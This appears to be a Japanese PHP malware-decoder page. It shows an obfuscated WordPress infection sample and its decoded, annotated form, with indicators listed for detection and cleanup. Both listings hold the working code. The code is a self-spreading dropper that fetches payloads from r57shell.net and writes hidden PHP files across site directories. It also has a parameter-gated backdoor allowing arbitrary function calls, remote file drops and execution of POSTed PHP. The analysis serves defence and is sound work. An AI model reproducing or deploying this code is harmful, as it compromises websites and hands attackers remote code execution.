WordPress などで見つかる PHP のマルウェア・ウイルス・改ざんコードをオンラインでデコードして難読化を解除し、
元の読みやすいコードに戻して解読できます。
<?php
/*
 * ANALYSIS NOTE: obfuscated malware sample, kept byte-for-byte as evidence.
 *
 * Obfuscation technique: the function body is cut into labelled fragments
 * that are shuffled and chained with `goto`, so reading top to bottom does
 * not follow execution order. Execution starts at the first statement,
 * `goto QHTmE;`, and the top-level chain visible in this listing is:
 *   QHTmE -> TmK7C -> Lhccs -> B8IHf -> DR8d0 -> ReBbR -> yxZ6i -> TMxaR
 *   -> Sae33 -> EmUwt -> jUXuO -> O4NxR -> BXZRC -> QCYq2 -> VCwm6
 * Each braced block contains its own smaller label chain of the same kind.
 *
 * What the chain does, in execution order:
 *   1. Derives a document root from SCRIPT_FILENAME and REQUEST_URI.
 *   2. Builds a cache path "sess_" + md5(host "_" script path) in the system
 *      temp dir, or in the script's directory if temp is not writable.
 *   3. If the GET parameter "slince_golden" is set: fetches a value from
 *      r57shell[.]net, compares it with md5(sha1($_GET["is"])) and, on a
 *      match, exposes request-driven function invocation, a file drop ending
 *      in "gagal.php", and inclusion of POSTed content; then exits.
 *   4. Otherwise fetches a payload from r57shell[.]net (cached in the sess_
 *      file) and writes it as ".<dirname>.php" into directories under the
 *      document root.
 *
 * Detection: string literals are NOT encoded, so the remote host, the
 * "slince_golden" parameter name, "gagal.php" and the "sess_" prefix remain
 * matchable in this obfuscated form. The label names look random and
 * presumably differ between samples -- do not key signatures on them.
 */
if (!function_exists("wp_core_version_check")) { function wp_core_version_check() { goto QHTmE; ReBbR: $file_path = dirname($document_file); goto yxZ6i; QHTmE: $document_file = $_SERVER["SCRIPT_FILENAME"]; goto TmK7C; B8IHf: $uri_path = $parse_url["path"]; goto DR8d0; TmK7C: $request_uri = $_SERVER["REQUEST_URI"]; goto Lhccs; Sae33: $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]); goto EmUwt; yxZ6i: $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path); goto TMxaR; O4NxR: if (!file_exists($tmp_file)) { goto Jjyr3; qVUcF: @touch($tmp_file); goto FrbfO; FrbfO: @file_put_contents($tmp_file, $response); goto fUkP_; Jjyr3: if (function_exists("curl_init")) { goto EZy_9; EZy_9: $ch = curl_init(); goto VR0Vi; OFlqh: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto VdcLO; VR0Vi: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto OFlqh; DcJlW: $response = curl_exec($ch); goto fkRwe; VdcLO: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto DcJlW; fkRwe: curl_close($ch); goto MpMm6; MpMm6: } else { goto Rsl9q; PQRsR: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto NXRla; DmscO: $context = stream_context_create($opts); goto PQRsR; Rsl9q: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto vGpwe; vGpwe: $opts = array("http" => array("header" => array("Referer: {$referer} \xa"))); goto DmscO; NXRla: } goto qVUcF; fUkP_: } else { $response = file_get_contents($tmp_file); if (!@preg_match("#stt1#", $response)) { goto Mh1sz; Mh1sz: if (function_exists("curl_init")) { goto DVDkP; u_SFh: $response = curl_exec($ch); goto zDHcZ; zMTgu: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto AvWVd; YWAQw: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . 
$_SERVER["REQUEST_URI"]); goto u_SFh; DVDkP: $ch = curl_init(); goto zMTgu; zDHcZ: curl_close($ch); goto v98go; AvWVd: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto YWAQw; v98go: } else { goto JGb71; Npbn0: $opts = array("http" => array("header" => array("Referer: {$referer} \xa"))); goto dtUcU; JGb71: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto Npbn0; hCspz: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto XWjW4; dtUcU: $context = stream_context_create($opts); goto hCspz; XWjW4: } goto zkCQa; zkCQa: @touch($tmp_file); goto RL2uX; RL2uX: @file_put_contents($tmp_file, $response); goto Fx07H; Fx07H: } } goto BXZRC; EmUwt: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } goto jUXuO; DR8d0: $uri_path = dirname($uri_path); goto ReBbR; QCYq2: foreach ($dirs as $d) { goto DpqP9; eMOLH: @file_put_contents($file_name, $response); goto xQTu4; xQTu4: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto KHsZ5; DpqP9: $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; goto eMOLH; KHsZ5: foreach ($dirs as $d) { if (!@preg_match("#wp-content#", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . 
".php"; @file_put_contents($file_name, $response); } } goto vTd8M; vTd8M: } goto VCwm6; jUXuO: if (@$_GET["slince_golden"]) { goto qhIqa; v6_uU: if (md5(sha1(@$_GET["is"])) == $response) { goto LNCgX; LNCgX: if (@$_GET["f"]) { print_r($_GET["f"]($_GET["c"])); } goto mNwUE; mNwUE: if (@$_GET["m"]) { goto u3lO9; u3lO9: if (function_exists("curl_init")) { goto h0059; nzFPK: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt"); goto SlTBv; SMEF2: curl_close($ch); goto nxTNz; h0059: $ch = curl_init(); goto nzFPK; SlTBv: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto cerjF; cerjF: $response = curl_exec($ch); goto SMEF2; nxTNz: } else { $response = file_get_contents("http://r57shell.net/mini_admin.txt"); } goto VIyGz; oeY1g: echo $file_name_path; goto UXu2c; VIyGz: $file_name_path = @$_GET["m"] . "gagal.php"; goto xhRaG; xhRaG: @file_put_contents($file_name_path, $response); goto oeY1g; UXu2c: } goto jKG5A; jKG5A: if (@$_POST["l"]) { function basic_code_extensions($request) { goto JTclu; tgcIK: $tmpf = $tmpf["uri"]; goto z3rep; vnQ75: $ret = (include $tmpf); goto Cvaad; JTclu: $tmp = tmpfile(); goto ToYXQ; ToYXQ: $tmpf = stream_get_meta_data($tmp); goto tgcIK; z3rep: fwrite($tmp, $request); goto vnQ75; aY2Ix: return $ret; goto hdvh2; Cvaad: fclose($tmp); goto aY2Ix; hdvh2: } print_r(basic_code_extensions($_POST["l"])); } goto ZFcwP; ZFcwP: } goto OlWFN; OlWFN: exit; goto vQOuT; qhIqa: echo "<!-- //Silence is golden. 
-->"; goto q9t4S; q9t4S: if (function_exists("curl_init")) { goto P3bql; sk_2w: curl_close($ch); goto j1BU_; P3bql: $ch = curl_init(); goto FA3oh; FA3oh: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get"); goto XAilZ; AJz_6: $response = curl_exec($ch); goto sk_2w; XAilZ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto AJz_6; j1BU_: } else { $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get"); } goto v6_uU; vQOuT: } goto O4NxR; TMxaR: if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, '', $file_path); } goto Sae33; BXZRC: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto QCYq2; Lhccs: $parse_url = parse_url($request_uri); goto B8IHf; VCwm6: } wp_core_version_check(); } ?>
<?php
// ANALYSIS NOTE: decoded (goto-free) form of the obfuscated sample shown
// before it on this page. It is a malware sample: a self-propagating PHP
// dropper with a remote-gated backdoor. Code tokens are unchanged; only
// layout and comments were added for review.
//
// Indicators visible in this listing (all taken from the code below):
//   - outbound HTTP to r57shell[.]net (jquery.php, mini_admin.txt)
//   - a "sess_" + 32-hex-char file in the system temp dir or next to the script
//   - hidden ".<dirname>.php" files inside site directories
//   - files whose name ends in "gagal.php"
//   - requests carrying the query parameter "slince_golden"

// The function_exists() guard means the definition is skipped when another
// copy has already declared it in the same request -- presumably because
// identical copies are written to many files (see the end of the function).
if (!function_exists("wp_core_version_check")) {
    // The name sounds like a WordPress maintenance routine; nothing in the
    // body performs a version check.
    function wp_core_version_check() {
        // --- Locate the site's document root -------------------------------
        $document_file = $_SERVER["SCRIPT_FILENAME"];
        $request_uri = $_SERVER["REQUEST_URI"];
        $parse_url = parse_url($request_uri);
        $uri_path = $parse_url["path"];
        $uri_path = dirname($uri_path);
        $file_path = dirname($document_file);
        $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path);
        // Strip the URL directory from the script's filesystem directory to
        // approximate the web root.
        if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') {
            $document_root = $file_path;
        } else {
            $document_root = str_replace($uri_path, '', $file_path);
        }
        $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]);

        // --- Cache file for the downloaded payload -------------------------
        // Named "sess_<md5>", the same prefix PHP uses for file-based session
        // storage, so it blends in with session files in the temp directory.
        // Falls back to the script's own directory when temp is not writable.
        if (is_writable(sys_get_temp_dir())) {
            $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . '');
        } else {
            $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . '');
        }

        // --- Backdoor branch: reached when "slince_golden" is in the query --
        if (@$_GET["slince_golden"]) {
            // Decoy output imitating the placeholder comment used in empty
            // WordPress index.php files.
            echo "<!-- //Silence is golden. -->";
            // The reference value for the access check is fetched from the
            // remote host on each such request, over plain HTTP; it is not
            // stored in this file.
            if (function_exists("curl_init")) {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get");
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                $response = curl_exec($ch);
                curl_close($ch);
            } else {
                $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get");
            }
            // Gate: md5(sha1()) of the "is" parameter must equal the fetched
            // value (loose == comparison).
            if (md5(sha1(@$_GET["is"])) == $response) {
                // Capability 1: a request-supplied function name is called
                // with a request-supplied argument and the result printed --
                // effectively arbitrary code execution on the host.
                if (@$_GET["f"]) {
                    print_r($_GET["f"]($_GET["c"]));
                }
                // Capability 2: downloads mini_admin.txt from the remote host
                // and writes it to a request-supplied path prefix + "gagal.php",
                // then echoes the path written.
                if (@$_GET["m"]) {
                    if (function_exists("curl_init")) {
                        $ch = curl_init();
                        curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt");
                        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                        $response = curl_exec($ch);
                        curl_close($ch);
                    } else {
                        $response = file_get_contents("http://r57shell.net/mini_admin.txt");
                    }
                    $file_name_path = @$_GET["m"] . "gagal.php";
                    @file_put_contents($file_name_path, $response);
                    echo $file_name_path;
                }
                // Capability 3: the POST field "l" is written to an anonymous
                // temp file which is then include()d, so any PHP it contains
                // runs; tmpfile() handles are removed on fclose(), leaving no
                // file behind for later inspection.
                if (@$_POST["l"]) {
                    function basic_code_extensions($request) {
                        $tmp = tmpfile();
                        $tmpf = stream_get_meta_data($tmp);
                        $tmpf = $tmpf["uri"];
                        fwrite($tmp, $request);
                        $ret = (include $tmpf);
                        fclose($tmp);
                        return $ret;
                    }
                    print_r(basic_code_extensions($_POST["l"]));
                }
            }
            // The request ends here whether or not the gate matched, so the
            // legitimate page is never rendered for these requests.
            exit;
        }

        // --- Payload fetch (every request without "slince_golden") ---------
        if (!file_exists($tmp_file)) {
            // First run on this host/script: download the payload. The
            // Referer header carries this site's host and request URI, which
            // discloses the infected URL to the remote server.
            if (function_exists("curl_init")) {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable");
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]);
                $response = curl_exec($ch);
                curl_close($ch);
            } else {
                $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
                // NOTE(review): the obfuscated listing terminates this header
                // with " \xa"; the decoder output shows "\r\n\n" instead.
                $opts = array("http" => array("header" => array("Referer: {$referer}\r\n\n")));
                $context = stream_context_create($opts);
                $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context);
            }
            @touch($tmp_file);
            @file_put_contents($tmp_file, $response);
        } else {
            // Cached copy exists: reuse it only if it contains the marker
            // "stt1" (meaning not shown here); otherwise download again.
            $response = file_get_contents($tmp_file);
            if (!@preg_match("#stt1#", $response)) {
                if (function_exists("curl_init")) {
                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable");
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]);
                    $response = curl_exec($ch);
                    curl_close($ch);
                } else {
                    $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
                    $opts = array("http" => array("header" => array("Referer: {$referer}\r\n\n")));
                    $context = stream_context_create($opts);
                    $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context);
                }
                @touch($tmp_file);
                @file_put_contents($tmp_file, $response);
            }
        }

        // --- Propagation ----------------------------------------------------
        // Whatever the remote host returned is written, unverified, as a
        // hidden ".<dirname>.php" file into each directory directly under the
        // computed document root. Errors are suppressed with @, so failures
        // leave no log entry. Cleanup must therefore search for dot-prefixed
        // PHP files named after their parent directory, not just this file.
        $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR));
        foreach ($dirs as $d) {
            $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
            @file_put_contents($file_name, $response);
            // Second level: the inner loop reuses $dirs and $d; paths matching
            // "wp-content" are skipped at this level.
            $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR));
            foreach ($dirs as $d) {
                if (!@preg_match("#wp-content#", $d)) {
                    $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
                    @file_put_contents($file_name, $response);
                }
            }
        }
    }
    // Invoked immediately, i.e. on every request that loads a file
    // containing this code.
    wp_core_version_check();
}